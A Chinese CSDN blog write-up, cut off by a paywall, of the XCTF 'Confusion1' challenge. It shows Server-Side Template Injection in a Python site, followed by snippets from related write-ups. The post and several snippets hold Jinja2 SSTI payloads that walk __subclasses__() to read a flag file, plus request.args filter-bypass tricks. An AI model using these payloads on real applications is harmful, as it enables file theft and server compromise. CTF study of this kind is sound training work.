【网络安全 | XCTF】Confusion1

秋说

已于 2024-05-31 10:02:12 修改

阅读量1.7k

点赞数 20

分类专栏： CTF 文章标签： web安全

于 2023-12-29 11:04:50 首次发布

该原创文章未经本人许可，不得用于商业用途。未经授权不得转载，否则保留追究法律责任的权利。

本文链接：https://blog.csdn.net/2301_77485708/article/details/135286432

版权

CTF 专栏收录该内容

80 篇文章 12 订阅 ¥19.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了网络安全领域的XCTF挑战赛中的一道题目——Confusion1，主要涉及SSTI（Server-Side Template Injection）注入问题。通过分析题目描述，发现网站存在SSTI漏洞，且在register的源码页面中揭示了flag路径。在尝试文件读取的过程中，参数被过滤，但通过调整参数，最终成功绕过过滤获取到flag。

摘要由CSDN通过智能技术生成

该题考察SSTI注入

正文

题目描述：某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器)

在这里插入图片描述
register的源码页面中存在flag路径

在这里插入图片描述
可以看到网站存在SSTI漏洞

在这里插入图片描述

构造POC尝试文件读取：

{
  {"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}

参数被过滤：

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

秋说

关注关注

20
点赞
踩
19

收藏

觉得还不错? 一键收藏
打赏
7
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

【网络安全 | XCTF】2017_Dating_in_Singapore

等风来

12-29

1846

01代表1号 08代表8号我们就能将其串联起来得到十二个字符。得到十二行，猜测对应一到十二月的日期。

XCTF 4th-QCTF-2018 Confusion1

feng的博客

10-31

706

知识点 SSTI模板注入猜图（狗头） WP 进入环境可以发现啥都没有，重要的是这个图：想办法联想到这个：知道和python相关。。。（狗头）首先访问login.php和register.php，发现都是404。经过一系列尝试，发现这个网站只有index.php，但是404的页面响应头里有这个：  因此知道了flag文件的位置，但是不知道怎么去读取这个文件。其

7 条评论您还未登录，请先登录后发表或查看评论

攻防世界 web高手进阶区 7分题Confusion1

闵行小鱼塘

10-11

2918

继续ctf的旅程，开始攻防世界web高手进阶区的7分题，本文是Confusion1的writeup

xctf攻防世界 Web高手进阶区 Confusion1

l8947943的博客

12-30

1903

1. 直接进入场景，查看环境 2. 分析映入眼帘的是神马奇葩玩意? 思考了一下，蟒蛇（Python）？大象（ElePHPant）？两个扭扯想说明啥？。。不懂打开控制台，看看有没有提示戳一戳链接，发现longin页面和register页面都有如下信息 emmm，按时flag的位置？ blue-whale是什么破玩意？点完后更加懵逼了，大胆猜测，需要审计源码，那么尝试.git漏洞，看能不能搞到源码，如图得，没戏，看看robots.txt同样的显示，说明不能看到源码。如何访问到提示的flag内

【网络安全 XCTF】Confusion1_xctf confusion1

最新发布

2401_84968529的博客

05-13

321

自我介绍一下，小编13年上海交大毕业，曾经在小公司待过，也去过华为、OPPO等大厂，18年进入阿里一直到现在。深知大多数网络安全工程师，想要提升技能，往往是自己摸索成长，但自己不成体系的自学效果低效又漫长，而且极易碰到天花板技术停滞不前！因此收集整理了一份《2024年网络安全全套学习资料》，初衷也很简单，就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料，也有适合3年以上经验的小伙伴深入学习提升的进阶课程，基本涵盖了95%以上网络安全知识点！真正的体系化！

攻防世界Confusion1

qq_43774856的博客

12-09

805

Confusion1 打开链接，如图所示点击login，发现无法访问，查看一下源码，有flag的信息看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了经过测试，过滤了很多关键字，如class，subclasses等。这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[

攻防世界--Confusion1

qq_46263951的博客

01-16

486

进入页面看到给出一个目录访问后给出flag的目录测试发现存在SSTI漏洞发现存在过滤但是并未过滤request，request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。利用file类读取文件最终payload： {{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0a.

【网络安全 | XCTF】Python之Django模块+curl 攻防世界 Cat 解题详析

等风来

05-30

3698

无回显，可能是因为/opt/api/是整个API项目的根目录，而/opt/api/api/是API应用程序的特定子目录，用于存放与API功能相关的文件。使用@+文件路径时，CURL将自动读取该文件内容并将其作为请求参数。这是python的Django模块，其数据库database文件存在于opt/api下的setting.py文件中。当使用文件路径作为参数时，若文件路径指定有误或不存在，则无法正确读取文件内容。flag为：WHCTF{yoooo_Such_A_G00D_@}题目描述：抓住那只猫。

【网络安全 | XCTF】simple_transfer

等风来

12-29

1905

考察kali基本工具的使用。执行数据恢复：并没有有利信息，但观察到多数数据包损坏：存在较多协议，将协议分级： foremost -t all -i Desktop/f9809647382a42e5bfb64d7d447b4099.pcap

【网络安全 | XCTF】攻防世界 ics-05 解题详析

等风来

05-31

3816

题目描述：其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件，如。构造Payload如下，实现将sub中的。根据提示，进入维护中心页面。查看源代码发现注入点。

攻防世界-Confusion1

m0_49025459的博客

02-14

644

访问题目场景某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道，这个网址是python写的，那python语言书写的网址，存在最多的大概率是SSTI模板注入。

qq_62097048的博客

11-20

921

做的相关题目，也查阅了相关的wp,希望对新手有帮助

攻防世界----confusion1

qq_44418229的博客

07-22

1242

攻防世界----confusion1 如何确定是SSTI漏洞；确定后要怎么绕过

攻防世界 Confusion1

CyhDl666的博客

02-26

300

进入页面 index.php页面查看了源码,没有什么发现进入Login.php页面返回404？？？查看一下源码从这里看可能是个SSTI模板注入这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是从这里来看应该是存在一个过滤想到做过的SSTI题目 shrine用的是url_for函数尝试一下 ...

【攻防世界WEB】难度四星12分进阶题：Confusion1

07-23

768

【攻防世界WEB】四星12分

攻防世界web进阶区 Confusion1

akxnxbshai的博客

01-24

3622

攻防世界web进阶区 Confusion1 难度系数：四星题目来源： XCTF 4th-QCTF-2018 题目描述：某天，Bob说：PHP是最好的语言，但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候，我发现其存在问题。(请不要使用扫描器) 题目提到了php，打开网址首先看到一张图蛇缠在大象身上猜测此系统使用了php+python （php的标志是大象，Python的标志是蛇）然后进入了注册页面发现flag的位置想到了本题可能存在Python ..

【愚公系列】2023年05月攻防世界-Web（Confusion1）

时光隧道

05-27

7862

SSTI漏洞（Server Side Template Injection，服务端模板注入漏洞）是一种 web 应用程序中的安全漏洞，它允许攻击者通过在模板中注入恶意代码，执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成，这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码，从而实现任意代码执行，甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞，因为攻击者可以完全控制服务器端执行的代码和结果。